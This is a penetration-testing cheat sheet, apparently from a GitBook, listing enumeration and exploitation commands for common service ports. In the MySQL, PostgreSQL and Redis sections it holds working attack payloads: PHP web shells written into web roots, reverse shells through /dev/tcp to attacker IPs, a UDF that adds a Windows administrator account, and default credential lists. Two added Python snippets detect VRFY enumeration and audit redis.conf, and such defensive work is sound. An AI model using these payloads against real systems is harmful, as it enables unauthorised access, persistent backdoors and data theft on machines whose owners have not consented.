# Ports

### FTP - 21

```bash
# All FTP Nmap Scripts
nmap -p21 --script ftp-* 10.10.10.100

# Anonymous login (username: anonymous)
ftp 10.10.10.100

# Using FTP
ftp> get file.txt
ftp> mget *.txt

# Using wget
wget -m --no-passive ftp://anonymous:anonymous@<target>/
wget -r ftp://USER:PASS@IP:PORT

# Using FTP
ftp> put local.txt
ftp> mput *.txt

# Using cURL
curl -T local.txt ftp://user:pass@<target>/
```

### SMTP - 25

```bash
# Connect to port 25 to start the mail transaction
nc -nvv 10.10.10.100 25
HELO foo

# A VRFY request asks the server to verify an email address
telnet 10.10.10.100 25
VRFY root

# Username guessing using VRFY with a custom wordlist generated by username-anarchy
# E.g. wordlists: /usr/share/wordlists/metasploit/namelist.txt
./username-anarchy --input-file /home/user/Documents/users.txt > names.txt
smtp-user-enum -M VRFY -U /usr/share/SecLists/Usernames/Names/names.txt -t 10.10.10.100

# Send mail (straight quotes are required; curly quotes break the arguments)
swaks -t mailadmin@localhost --from jonas@localhost --attach @file.odt --server 10.10.10.100 --body "Please check this spreadsheet" --header "Subject: Please check this spreadsheet"
```
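As an added, defensive counterpart to the VRFY user guessing above (example code, not part of the original page): a detector that flags clients sending bursts of VRFY commands, run over constructed lines in a hypothetical SMTP command-log format.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in a hypothetical SMTP command-log format; not from any real MTA.
SAMPLE_LOG = """\
2024-05-01T10:00:01 client=192.0.2.10 cmd="HELO foo" reply=250
2024-05-01T10:00:02 client=192.0.2.10 cmd="VRFY root" reply=252
2024-05-01T10:00:03 client=192.0.2.10 cmd="VRFY admin" reply=550
2024-05-01T10:00:03 client=192.0.2.10 cmd="VRFY jonas" reply=252
2024-05-01T10:00:04 client=192.0.2.10 cmd="VRFY backup" reply=550
2024-05-01T10:00:05 client=192.0.2.10 cmd="VRFY www-data" reply=550
2024-05-01T10:00:30 client=198.51.100.7 cmd="HELO mail.example.net" reply=250
2024-05-01T10:00:31 client=198.51.100.7 cmd="VRFY postmaster" reply=252
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) client=(?P<client>\S+) cmd="(?P<cmd>[^"]*)" reply=(?P<reply>\d{3})$')

def parse(log):
    """Yield (timestamp, client, command verb, reply code) per well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that do not fit the expected format
        yield (datetime.fromisoformat(m["ts"]), m["client"],
               m["cmd"].split(" ", 1)[0].upper(), int(m["reply"]))

def detect_vrfy_enumeration(log, threshold=5, window=timedelta(seconds=60)):
    """Return {client: (vrfy_total, rejected_total)} for every client that sent
    at least `threshold` VRFY commands inside some `window`-long interval."""
    recent = defaultdict(deque)            # client -> timestamps of VRFYs in window
    totals = defaultdict(lambda: [0, 0])   # client -> [all VRFYs, 5xx-rejected VRFYs]
    flagged = {}
    for ts, client, verb, reply in parse(log):
        if verb != "VRFY":
            continue
        totals[client][0] += 1
        if reply >= 500:                   # 550 "user unknown": a guess that missed
            totals[client][1] += 1
        q = recent[client]
        q.append(ts)
        while ts - q[0] > window:          # drop VRFYs older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged[client] = tuple(totals[client])
    return flagged
```

A high share of 5xx replies among the flagged client's VRFYs is the tell-tale of wordlist-driven guessing rather than a legitimate mail relay verifying a few recipients.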

### POP3 - 110,995

```bash
# Connect (plaintext on 110 with nc, TLS on 995 with openssl)
nc -nv <target> 110
USER username
PASS password

openssl s_client -connect <target>:995
```

```bash
# Commands Available
POP commands:
USER uid           Log in as "uid"
PASS password      Substitute "password" for your actual password
STAT               List number of messages, total mailbox size
LIST               List messages and sizes
RETR n             Show message n
DELE n             Mark message n for deletion
RSET               Undo any changes
QUIT               Logout (expunges messages if no RSET)
TOP msg n          Show first n lines of message number msg
CAPA               Get capabilities
```

### RPCBind - 111

```bash
rpcinfo -p 10.10.10.100
rpcclient -U "" 10.10.10.100
```

### IMAP - 143,993

```bash
# Connect Methods
telnet 10.10.10.100 143
openssl s_client -connect 10.10.10.100:993

# Authenticate
a1 LOGIN <username> <password>

# List folders
a2 LIST "" "*"

# Select the inbox
a3 SELECT INBOX

# Fetch the full body of message 1
a4 FETCH 1 BODY[]

a5 LOGOUT
```

### SNMP - 169

```bash
# Walks the entire SNMP tree and gets all possible information
snmpwalk -c public -v1 -t 10 10.10.10.100
# Gets Windows User Accounts
snmpwalk -c public -v1 10.10.10.100 1.3.6.1.4.1.77.1.2.25
# Gets Running Processes
snmpwalk -c public -v1 10.10.10.100 1.3.6.1.2.1.25.4.2.1.2
# Gets Installed Software
snmpwalk -c public -v1 10.10.10.100 1.3.6.1.2.1.25.6.3.1.2
# Gets TCP Connections (Remote Addresses / Ports)
snmpwalk -c public -v1 10.10.10.100 1.3.6.1.2.1.6.13.1.3
# Find the SNMP community string
hydra -P /usr/share/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://<IP>
# See custom shell scripts or commands
snmpwalk -v2c -c public 10.10.10.100 1.3.6.1.4.1.8072.1.3.2
```

### NFS - 2049 (TCP/UDP)

```bash
showmount -e 10.10.10.100
mount -t nfs 10.10.10.100:/ /tmp/nfs-dir -o nolock
```

### MYSQL - 3306

{% hint style="info" icon="triangle-exclamation" %}
Running **mysql** in the command line needs a TTY shell to provide output.
{% endhint %}

```bash
# Login and provide password
mysql -h 10.10.10.100 -u root -p

# Login without password
mysql -h 10.10.10.100 -u root

# Connect to specific DB
mysql -u username -p database_name

# Connect and execute query
mysql -u username -p -e "SELECT @@version;"

# Check if UPDATE TABLES permission is available
UPDATE users SET password='<HASH>' WHERE user_id='admin';

# Write to files
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'C:/wamp/www/shell.php';
SELECT 1,2,"<?php echo shell_exec($_GET['c']);?>",4 INTO OUTFILE 'C:/xampp/htdocs/back.php';
# SQL Injection -> ' UNION SELECT '<?php echo system($_GET["cmd"]);' INTO OUTFILE '/var/www/cmd.php'; --

# UDF Attacks
# Library File link - https://www.exploit-db.com/exploits/1518
# LINUX:
use mysql;
create table npn(line blob);
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so')); #You might need to change the path and file name
show variables like '%plugin%'; #  Get the plugin_dir path
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

# WINDOWS:
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
```

### POSTGRES - 5432

```bash
# Connect 
psql -h 10.10.10.100 -U postgres -W

# Default creds
postgres : postgres
postgres : password
postgres : admin
admin : admin
admin : password

# Version Enumeration
SELECT version();

\l # List DBs
\du # List all users
\du+ # List current user permissions

# Get User privileges
SELECT usename, usecreatedb, usesuper FROM pg_user;

# Get Superusers
SELECT usename FROM pg_user WHERE usesuper = true;

# Read Files with COPY FROM
CREATE TABLE temp_table(content text);
COPY temp_table FROM '/etc/passwd';
SELECT * FROM temp_table;
DROP TABLE temp_table;

# Write Files with COPY TO
COPY (SELECT 'malicious content') TO '/tmp/note.txt';

# Execute Commands via COPY PROGRAM
COPY (SELECT '') TO PROGRAM 'id > output.txt';
COPY (SELECT '') TO PROGRAM 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1';
COPY (SELECT '') TO PROGRAM '/bin/bash -c "bash -i >& /dev/tcp/<ip>/80 0>&1"';

# Read files via pg_* commands
SELECT pg_read_file('/etc/passwd');
SELECT pg_ls_dir('/var/www/html');
```

More info: <https://hackviser.com/tactics/pentesting/services/postgresql#pg_read_file-exploitation>

### VNC - 5900s

```bash
# Basic connection
vncviewer target.com:5900

# With display number (5900 + display)
vncviewer target.com:0  # Port 5900
vncviewer target.com:1  # Port 5901

# With password file
vncviewer -passwd ~/.vnc/passwd target.com:0

# Windows
tvnviewer.exe target.com::5900

# Linux
vncviewer target.com:5900
```

```bash
# Common VNC passwords
password
12345678
vnc123
admin
administrator
```

More info: <https://hackviser.com/tactics/pentesting/services/vnc>

### Redis - 6379

```bash
# Gather version and service information
nc -nv <IP> 6379

# Authentication and common credentials to try:
# admin:admin
# administrator:administrator
# root:root
# user:user
# test:test
# redis:redis
redis-cli -h <IP> --user <username> -a <password>

# Common REDIS commands
GET <KEY_NAME>
KEYS *
CONFIG GET *
INFO
CLIENT LIST
MODULE LOAD /path/to/module.so

# Load module and execute custom commands (Compile malicious module with system() function)
redis-cli -h <IP>
> MODULE LOAD /path/to/evil.so # Assumes .so file is already inside the target machine
> evil.exec "whoami"
> evil.exec "bash -i >& /dev/tcp/attacker-ip/4444 0>&1"

# Redis RCE for Redis 4.x / 5.x / <= 5.0.9
# 1. Usage: python redis-rce.py -r <RHOST> -p <REDIS_PORT> -L <LHOST> -P <LPORT> -f exp_lin.so 
https://github.com/Ridter/redis-rce -> Get the script from here
https://github.com/jas502n/Redis-RCE -> Get the compiled .so from here

# 2. Similar to above but you can compile the .so file here
https://github.com/n0b0dyCN/redis-rogue-server -> Compile and run the script
```

More info: <https://hackviser.com/tactics/pentesting/services/redis#connect>
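As an added hardening check (example code, not from the original page or from Redis itself): an audit of redis.conf text for the settings that make the unauthenticated `nc`, `redis-cli` and `MODULE LOAD` steps above possible, run on two constructed config fragments.

```python
import shlex

# Constructed redis.conf fragments, not from any real deployment: WEAK_CONF
# permits the unauthenticated nc / redis-cli / MODULE LOAD steps above,
# HARDENED_CONF closes each of those paths.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
"""

HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
# placeholder secret, set a long random value in a real deployment
requirepass CHANGE-ME-placeholder
rename-command MODULE ""
rename-command CONFIG ""
"""

def parse_conf(text):
    """Return {directive: [argument lists, in file order]} from redis.conf text."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):   # blank or full-line comment
            continue
        parts = shlex.split(line)              # keeps "" as an empty argument
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def audit(text):
    """List the settings that let an unauthenticated remote client reach Redis
    and load modules; an empty list means none of these weaknesses was found."""
    conf = parse_conf(text)
    findings = []
    if "requirepass" not in conf:
        findings.append("no requirepass: every client reaching the port is trusted")
    if conf.get("protected-mode", [["yes"]])[-1][:1] == ["no"]:
        findings.append("protected-mode no: remote clients accepted without auth")
    binds = [a.lstrip("-") for args in conf.get("bind", []) for a in args]
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind: listening on all interfaces")
    disabled = {args[0].upper() for args in conf.get("rename-command", [])
                if len(args) == 2 and args[1] == ""}
    for cmd in ("MODULE", "CONFIG"):
        if cmd not in disabled:
            findings.append(f'{cmd} reachable: add rename-command {cmd} ""')
    return findings
```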

### References

1. <https://edu.noirchapeau.com/footprinting-enumeration-and-information-gathering-notes/ftp-pentesting-notes#basic-information>
2. <https://hackviser.com/tactics/pentesting/services/postgresql#connect>
3. <https://x7331.gitbook.io/boxes/services/tcp>
4. <https://hackviser.com/tactics/pentesting>
